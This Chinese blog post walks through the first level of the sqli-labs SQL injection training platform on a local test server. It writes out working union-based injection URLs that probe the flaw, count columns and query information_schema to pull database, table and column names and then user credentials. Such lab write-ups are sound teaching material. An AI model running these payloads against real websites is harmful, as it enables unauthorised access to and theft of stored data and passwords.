sql-lib 闖關課程第一課

sql-libs是github上的一個專注於sql注入的平臺,目前網上關於這個平臺的資源很多,我的這個系列主要是分享與總結我得心得,下面開始吧

sql-libs下載地址

鏈接: sql-libs下載地址.

less1

我採用的環境是phpstudy集成環境,網上的教程很多,可以自行尋找搭建。我搭建的環境是php5.2.17+Apache2.4.39+Mysql8.0環境,在php5.2環境中magic_quotes_gpc = on默認開啓,此函數會對單引號進行轉義。對less1中單引號報錯時會出現一些問題,因此我在php.ini中使magic_quotes_gpc = off。開始實驗

實驗開始

首先使用bp抓取數據包,然後發送到repeat模塊中,方便測試。
在這裏插入圖片描述
經典的單引號測試注入點。界面出現異常說明存在注入點。繼續
在這裏插入圖片描述
下面進行and|or 1=1 和 and|or 1=2進一步測試注入
url測試語句 (–+是mysql的註釋功能,作用是消除–+後面的語句)
http://127.0.0.1/sqllib/Less-1/?id=1%27%20and%201=1%20–+
在這裏插入圖片描述
and 1=2報錯,說明該sql語句將我們想要查詢的數據一同帶入了數據庫查詢,下面開始曝列數,使用hackbar工具操作
在這裏插入圖片描述
http://127.0.0.1/sqllib/Less-1/?id=1’ order by 3 --+ 3個字段正常
在這裏插入圖片描述
order by 4 錯誤 說明有三個字段
http://127.0.0.1/sqllib/Less-1/?id=1’order by 4 --+
在這裏插入圖片描述
使用union select查詢出注入點在哪裏,也是就查詢的那幾列數據,聯合出查詢但是隻有一個回顯值,所以使得id等於-1報錯,這樣就可以報出來注入點
http://127.0.0.1/sqllib/Less-1/?id=-1’ UNION SELECT 1,2,3 --+
在這裏插入圖片描述

下面爆數據庫 使用union select語句
http://127.0.0.1/sqllib/Less-1/?id=-1’ UNION SELECT 1,group_concat(schema_name),3 from information_schema.schemata --+

使用group_concat 將數據一同輸出,information_schema 是mysql5.0以上的表,用來存儲表的信息
在這裏插入圖片描述
數據庫出來後就可以曝出表名了
http://127.0.0.1/sqllib/Less-1/?id=-1’ UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’–+
觀察group_concat函數中的不同點,where語句指定數據庫是security
在這裏插入圖片描述
得到table之後我們嘗試獲取users數據表中的列數據,看操作
http://127.0.0.1/sqllib/Less-1/?id=-1’ UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’–+
差異點就在箭頭的地方,很好理解,就是替換一下查詢列向量
在這裏插入圖片描述
最後知道了表和列的數據之後就可以通過查詢語句得到任意的數據了,比如我們獲取users表中的usernamel和password屬性
在這裏插入圖片描述
最終結束實驗,less1就完成了,主要還是注入的基本操作,練習一下手工注入吧,就這麼多吧,謝謝!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章